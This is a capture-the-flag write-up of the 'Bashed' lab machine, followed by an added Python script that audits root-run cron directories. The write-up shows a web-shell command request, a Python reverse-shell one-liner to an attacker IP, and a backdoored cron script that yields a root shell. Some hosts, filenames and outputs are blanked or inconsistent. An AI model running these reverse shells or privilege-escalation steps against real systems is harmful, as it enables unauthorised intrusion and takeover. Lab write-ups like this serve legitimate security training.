Bashed Write-Up



Using nmap's *-A* option (the lazy way: it enables OS detection, version detection, default scripts and traceroute in one go) we discover a single open port, 80, running Apache 2.4.18 (Ubuntu).

# nmap -A                        
Starting Nmap 7.91 ( ) at 2021-04-08 03:14 EDT
Nmap scan report for
Host is up (0.050s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
Let’s see what this website is about.

Dirbuster report

Of course, running a directory brute force is the next logical thing to do. It reveals a bunch of interesting directories and files:

DirBuster 1.0-RC1 - Report
Report produced on Thu Apr 08 03:25:09 EDT 2021
Directories found during testing:
Dirs found with a 200 response:
Dirs found with a 403 response:
Files found during testing:
Files found with a 200 responce:

The developer boasts on the site about a phpbash file he created there. Let’s see how we can use it to our advantage.

Burp Suite

I am going to try and see the contents of the file of interest.


The page executes bash commands on the target host as the web server user. Let’s cat our first flag 🙂

POST /dev/phpbash.min.php/ HTTP/1.1
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;


HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8


Let’s see how we can escalate our privileges and gain root.

First, let’s get a reverse shell:

  1. Change ATTACKING-IP and the port (80 here) to your listener's address and port, then run the one-liner through phpbash:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Let’s upgrade the shell to make it more usable:

  1. Spawn a proper TTY: python3 -c 'import pty;pty.spawn("/bin/bash")'
  2. Get access to terminal commands such as clear: export TERM=xterm
  3. Background the shell with Ctrl+Z, then turn on tab completion, arrow keys etc. by typing in the original terminal: stty raw -echo; fg

Privilege Escalation

  • Ran enumeration locally, but nothing was really of interest.
  • Looked for SGID/SUID files.
  • Finally, checked our sudo rights and received the following output:
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

It seems we (www-data) can run any command as user scriptmanager, and no password is required.

$ sudo -u scriptmanager whoami

To become user scriptmanager we type in:

sudo -u scriptmanager /bin/bash -i 

Let’s enumerate further. What does this user own or have access to?

scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null

It appears the user owns something within /scripts/:

scriptmanager@bashed:/scripts$ cat
f = open("test.txt", "w")
f.write("testing 123!")

It opens test.txt and writes a string into it, hmm. Who owns test.txt?

scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ../
-rw-r--r--  1 scriptmanager scriptmanager  282 Apr  8 03:19
-rw-r--r--  1 root          root            12 Apr  8 03:03 test.txt

So, if this script is executed by cron, it must be running as root, since test.txt is owned by root yet gets written to. Or perhaps the scheduler runs everything in the folder as root. Either way, let’s add some sauce: a Python reverse shell in the script.

scriptmanager@bashed:/scripts$ cat
import socket,subprocess,os
s.connect(("",5555))  # change this to the attacking IP

Once cron fires again, this results in a root reverse shell on our listener:

# nc -lnvp 5555
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
# cat /root/root.txt
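A defensive check for the misconfiguration exploited here, added as an example that is not part of the original write-up: it audits a directory that a root cron job executes scripts from and flags any script, symlink or directory that a non-root account could modify. The default path /scripts is an assumption, since the page never shows the cron entry itself.

```python
"""Audit a directory from which a root cron job executes scripts.

Added example, not code from the original write-up. It detects the
condition exploited above: a script run by root, or the directory holding
it, that a non-root account can modify. The default path /scripts is an
assumption for the demonstration.
"""
import os
import stat
import sys


def audit_entry(mode, uid, gid, trusted_uid=0, trusted_gid=0):
    """Return the reasons root should not trust this entry, or [] if it is fine.

    mode/uid/gid are the st_mode/st_uid/st_gid values of the entry; the
    trusted ids default to root, so any other owner is a privilege boundary.
    """
    reasons = []
    if uid != trusted_uid:
        reasons.append("owned by uid %d, not uid %d" % (uid, trusted_uid))
    if stat.S_ISLNK(mode):
        # A symlink's own permission bits are meaningless; the target matters.
        reasons.append("symlink, target may be attacker-controlled")
        return reasons
    if mode & stat.S_IWGRP and gid != trusted_gid:
        reasons.append("writable by group gid %d" % gid)
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_dir(path, trusted_uid=0, trusted_gid=0):
    """Audit the directory itself and each entry in it; returns {path: reasons}."""
    findings = {}
    st = os.lstat(path)
    reasons = audit_entry(st.st_mode, st.st_uid, st.st_gid, trusted_uid, trusted_gid)
    if reasons:
        findings[path] = reasons
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        st = os.lstat(full)  # lstat so symlinks are reported, not followed
        reasons = audit_entry(st.st_mode, st.st_uid, st.st_gid, trusted_uid, trusted_gid)
        if reasons:
            findings[full] = reasons
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/scripts"
    for entry, why in audit_dir(target).items():
        print("%s: %s" % (entry, "; ".join(why)))
```

Run against the listing above, the scriptmanager-owned directory and script are both reported, while the root-owned test.txt (mode 644) passes.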
